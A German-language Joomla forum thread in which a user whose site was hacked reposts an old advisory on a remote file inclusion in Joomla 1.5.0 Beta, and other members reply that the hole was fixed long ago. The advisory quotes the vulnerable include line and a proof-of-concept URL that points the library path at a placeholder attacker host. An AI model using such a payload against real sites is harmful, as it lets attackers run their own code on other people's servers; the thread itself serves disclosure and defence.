+ Antworten
Ergebnis 1 bis 4 von 4

Thema: Sicherheitslücke gefunden

  1. #1
    Neu an Board
    Registriert seit
    16.08.2007
    Beiträge
    1
    Bedankte sich
    0
    Erhielt 0 Danksagungen
    in 0 Beiträgen

    Standard Sicherheitslücke gefunden

    Hi.. heute wurde meine Joomla 1.5 seite gehacked.. und da hab ich bischen in google gesucht und folgendes gefunden.. vllt hat der Hacker auch damit angegriffen..
    ich möchte blos das die entwickler falls sie das nicht schon kennen es analysieren und auhc einen schutz dagegen einbauen
    das hier habe ich gefunden:
    Code:
    Hi,
    Joomla! 1.5.0 is in Beta version and "should NOT to be used for `live`
    or `production` sites."
    Joomla 1.0.12 has a good security but it seems that Joomla 1.5.0 doesnt
    have a good security approach. Anyway, there is a remote file inclusion
    in Joomla 1.5.0 Beta :
    
    File /libraries/pcl/pcltar.php, Line 74 :
     if (!defined("PCLERROR_LIB"))
     {
           include($g_pcltar_lib_dir."/pclerror.lib.".$g_pcltar_extension);
     }
    
    POC : http://hacked/libraries/pcl/pcltar.php?g_pcltar_lib_dir=http://hacker/?
    
    The original advisory (in Persian) is located at :
    http://www.hackers.ir/advisories/joomla.html
    
    
    - Omid
    
    # milw0rm.com [2007-04-23]
    Hoffe ich konnte bischen zur sicherheit von joomla helfen
    Greetz L1nK

  2. #2
    Gehört zum Inventar
    Registriert seit
    28.10.2003
    Beiträge
    6.257
    Bedankte sich
    8
    Erhielt 1.311 Danksagungen
    in 1.238 Beiträgen

    Standard

    die entwickler wissen das längst ist auch schon lang gefixt
    müssen die Hacker bei dir ein anderes Loch wohl gefunden haben...

    http://forum.joomla.org/index.php/topic,174016.0.html

  3. #3
    JoomGallery Avatar von Claudia E.
    Registriert seit
    12.04.2007
    Ort
    nahe Berlin
    Beiträge
    6.825
    Bedankte sich
    135
    Erhielt 1.768 Danksagungen
    in 1.678 Beiträgen

    Standard

    Joomla! 1.5.0 is in Beta version and "should NOT to be used for `live`
    or `production` sites."
    Viel mehr gibt's meiner Meinung nach eigentlich nicht zu sagen.

  4. #4
    Moderator Avatar von holmi
    Registriert seit
    30.08.2004
    Ort
    Harz
    Beiträge
    6.502
    Bedankte sich
    92
    Erhielt 1.234 Danksagungen
    in 1.133 Beiträgen

    Standard

    Welche Version der 1.5 hattest du denn im Einsatz, eine total veraltete Beta?
    Ich habe den Beitrag aufgrund deiner bisherigen Infos auf jeden Fall erstmal ins Archiv verschoben.
    Die 1.5 Beta ist längst Geschichte.

    Björn
    Problem gelöst? Dann markiere den Thread mit [GELÖST]

+ Antworten

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein